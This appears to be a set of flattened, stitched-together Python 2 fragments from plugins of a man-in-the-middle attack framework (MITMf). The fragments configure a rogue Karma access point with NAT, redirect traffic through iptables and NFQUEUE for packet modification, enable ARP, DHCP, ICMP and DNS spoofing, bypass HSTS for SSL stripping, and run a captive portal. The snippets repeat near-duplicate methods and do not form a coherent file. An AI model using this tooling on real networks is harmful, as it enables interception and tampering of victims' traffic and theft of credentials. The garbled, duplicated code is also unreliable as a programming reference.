def on_shutdown(self): '''This will be called when shutting down''' from core.utils import iptables iptables().flush() #FIXME: add forwarding rules if we are an access point pass
def _initialize_nat_simple(self): from core.utils import iptables, NetworkManager, set_ip_forwarding from core.hostapd_mana import HostAPDMana, DHCPDMana hostapd = HostAPDMana.get_instance() network_manager = NetworkManager.get_instance() dhcpd = DHCPDMana.get_instance() os.system('killall dnsmasq') network_manager.stop() os.system('rfkill unblock wlan') os.system('ifconfig %s up' % self.phy) hostapd.configure_karma(phy=self.phy, essid=self.essid, bssid=self.bssid, channel=self.channel) #hostapd.start() time.sleep(5) os.system('ifconfig %s 10.0.0.1 netmask 255.255.255.0' % self.phy) os.system('route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1') dhcpd.select_conf('dhcpd.conf') #dhcpd.start(self.phy) set_ip_forwarding(1) print 'setting up iptables' iptables().ROGUE_AP_NAT(upstream=self.upstream, phy=self.phy) if not iptables().http and self.options.filter is None: iptables().HTTP(self.options.listen_port)
def start(self): set_ip_forwarding(1) iptables().NFQUEUE() self.nfqueue = NetfilterQueue() self.nfqueue.bind(1, self.modify) self.nfqueue.run()
def start(self): set_ip_forwarding(1) iptables().NFQUEUE() self.nfqueue = NetfilterQueue() self.nfqueue.bind(0, self.modify) self.nfqueue.run()
def on_shutdown(self): from core.utils import iptables, set_ip_forwarding for protocol in self.protocol_instances: if hasattr(protocol, 'stop'): protocol.stop() iptables().flush() set_ip_forwarding(0)
def start(self): set_ip_forwarding(1) iptables().NFQUEUE() self.nfqueue = NetfilterQueue() self.nfqueue.bind(1, self.modify) t = threading.Thread(name='packetparser', target=self.nfqueue.run) t.setDaemon(True) t.start()
def initialize(self, options): self.options = options from core.sslstrip.URLMonitor import URLMonitor from core.servers.DNS import DNSChef from core.utils import iptables if iptables().dns is False: iptables().DNS(self.config['MITMf']['DNS']['port']) URLMonitor.getInstance().setHstsBypass() DNSChef().setHstsBypass()
def start(self): set_ip_forwarding(1) iptables().NFQUEUE(self.mode) self.q = nfqueue.queue() self.q.open() self.q.bind(socket.AF_INET) self.q.set_callback(self.modify) self.q.create_queue(0) while True: self.q.try_run() print("stopped")
def on_shutdown(self): from core.utils import iptables from core.hostapd_mana import HostAPDMana, DHCPDMana hostapd = HostAPDMana.get_instance() _iptables = iptables() dhcpd = DHCPDMana.get_instance() _iptables.flush() hostapd.stop() dhcpd.stop()
def initialize(self, options): '''Called if plugin is enabled, passed the options namespace''' self.options = options self.protocol_instances = [] from core.utils import iptables, shutdown, set_ip_forwarding #Makes scapy more verbose debug = False if options.arp: if not options.gateway: shutdown("[Spoof] --arp argument requires --gateway") from core.poisoners.ARP import ARPpoisoner arp = ARPpoisoner(options) arp.debug = debug self.tree_info.append('ARP spoofing enabled') self.protocol_instances.append(arp) elif options.dhcp: from core.poisoners.DHCP import DHCPpoisoner if options.targets: shutdown("[Spoof] --targets argument invalid when DCHP spoofing") dhcp = DHCPpoisoner(options) dhcp.debug = debug self.tree_info.append('DHCP spoofing enabled') self.protocol_instances.append(dhcp) elif options.icmp: from core.poisoners.ICMP import ICMPpoisoner if not options.gateway: shutdown("[Spoof] --icmp argument requires --gateway") if not options.targets: shutdown("[Spoof] --icmp argument requires --targets") icmp = ICMPpoisoner(options) icmp.debug = debug self.tree_info.append('ICMP spoofing enabled') self.protocol_instances.append(icmp) if options.dns: self.tree_info.append('DNS spoofing enabled') if iptables().dns is False and options.filter is None: iptables().DNS(self.config['MITMf']['DNS']['port']) if not options.arp and not options.icmp and not options.dhcp and not options.dns: shutdown("[Spoof] Spoof plugin requires --arp, --icmp, --dhcp or --dns") set_ip_forwarding(1) if iptables().http is False and options.filter is None: iptables().HTTP(options.listen_port) for protocol in self.protocol_instances: protocol.start()
def stop(self): self.q.unbind(socket.AF_INET) self.q.close() set_ip_forwarding(0) iptables().flush() sys.exit('closing...')
def on_shutdown(self): from core.utils import iptables if iptables().dns is True: iptables().flush()
def stop(self): self.nfqueue.unbind() set_ip_forwarding(0) iptables().flush()
def initialize(self, options): '''Called if plugin is enabled, passed the options namespace''' self.options = options self.protocol_instances = [] from core.utils import iptables, shutdown, set_ip_forwarding #Makes scapy more verbose debug = False if options.arp: if not options.gateway: shutdown("[Spoof] --arp argument requires --gateway") from core.poisoners.ARP import ARPpoisoner arp = ARPpoisoner(options) arp.debug = debug self.tree_info.append('ARP spoofing enabled') self.protocol_instances.append(arp) elif options.dhcp: from core.poisoners.DHCP import DHCPpoisoner if options.targets: shutdown( "[Spoof] --targets argument invalid when DCHP spoofing") dhcp = DHCPpoisoner(options) dhcp.debug = debug self.tree_info.append('DHCP spoofing enabled') self.protocol_instances.append(dhcp) elif options.icmp: from core.poisoners.ICMP import ICMPpoisoner if not options.gateway: shutdown("[Spoof] --icmp argument requires --gateway") if not options.targets: shutdown("[Spoof] --icmp argument requires --targets") icmp = ICMPpoisoner(options) icmp.debug = debug self.tree_info.append('ICMP spoofing enabled') self.protocol_instances.append(icmp) if options.dns: self.tree_info.append('DNS spoofing enabled') if iptables().dns is False: iptables().DNS(self.config['MITMf']['DNS']['port']) if not options.arp and not options.icmp and not options.dhcp and not options.dns: shutdown( "[Spoof] Spoof plugin requires --arp, --icmp, --dhcp or --dns") set_ip_forwarding(1) if iptables().http is False: iptables().HTTP(options.listen_port) for protocol in self.protocol_instances: protocol.start()
def on_shutdown(self): '''This will be called when shutting down''' from core.utils import iptables iptables().flush() pass
try: self.portal_ip = socket.gethostbyname(self.portal_url.hostname) #TODO: better method, scapy? except socket.gaierror, e: sys.exit("[-] Portal cannot resolve hostname: {}".format(e)) if options.portaldns: #TODO: if options.portaldns t2 = threading.Thread(name='captive_dns_thread', target=self.captive_dns, args=(self.mon_interface,)) t2.setDaemon(True) t2.start() else: sys.exit("[-] Portal requires portal url or portal template") #running on an access point from core.utils import iptables if iptables().http is False and options.filter is None: iptables().HTTP(options.listen_port) #Setup iptables to block all not allowed traffic self._block_traffic() def parse_template(self, path): if os.path.exists(path): # replace whole content f = open(path, 'r') data = f.read() f.close() return data else: sys.exit("[-] Error reading template file {}".format(path)) def options(self, options):
sys.exit("[-] Error parsing portal url: %s" % e) # get portal url ip address self.portal_ip = socket.gethostbyname('google.com') #TODO: better method, scapy? if options.portaldns: #TODO: if options.portaldns t2 = threading.Thread(name='captive_dns_thread', target=self.captive_dns, args=(self.mon_interface,)) t2.setDaemon(True) t2.start() else: sys.exit("[-] DNS records require portal url or portal template: %s" % e) #running on an access point from core.utils import iptables if iptables().http is False and options.filter is None: iptables().HTTP(options.listen_port) #Setup iptables to block all not allowed traffic self._block_traffic() def parse_template(self, path): if os.path.exists(path): # replace whole content f = open(path, 'r') data = f.read() f.close() return data else: sys.exit("[-] Error reading template file {}".format(path)) def options(self, options):